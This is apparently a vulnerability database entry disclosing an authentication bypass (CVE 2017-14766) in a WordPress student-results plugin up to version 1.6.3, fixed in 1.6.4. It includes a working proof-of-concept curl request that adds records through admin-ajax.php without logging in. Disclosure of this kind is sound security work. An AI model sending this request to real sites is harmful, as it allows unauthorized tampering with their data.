Student Result or Employee Database <= 1.6.3 - Auth Bypass



Proof of Concept
curl -i -s -k -X 'POST' \
  -H 'User-Agent: Mozilla/5.0' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'Referer: http://localhost/wp-admin/admin.php?page=ssr_add_results' \
  --data-binary 'action=ssr_add_st_submit&rid=123&rn=456&stn=john&stfn=smith&stpy=2017&stcgpa=5.00&stsub=Subject+3&stpy2=01011990&stpy3=male&stpy4=address&stpy5=smith&stpy6=extra1&stpy7=extra2&upload_image=' \
  'https://localhost/wp-admin/admin-ajax.php'

Affects Plugin

fixed in version 1.6.4

References

CVE 2017-14766
URL https://limbenjamin.com/articles/simple-student-result-auth-bypass.html
URL https://plugins.trac.wordpress.org/changeset/1733325/simple-student-result

Classification

Type AUTHBYPASS
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-287

Miscellaneous

Submitter Benjamin Lim
Submitter Website https://limbenjamin.com
Verified No
WPVDB ID 8920

Timeline

Publicly Published 2017-09-21
Added 2017-09-28
Last Updated 2017-09-29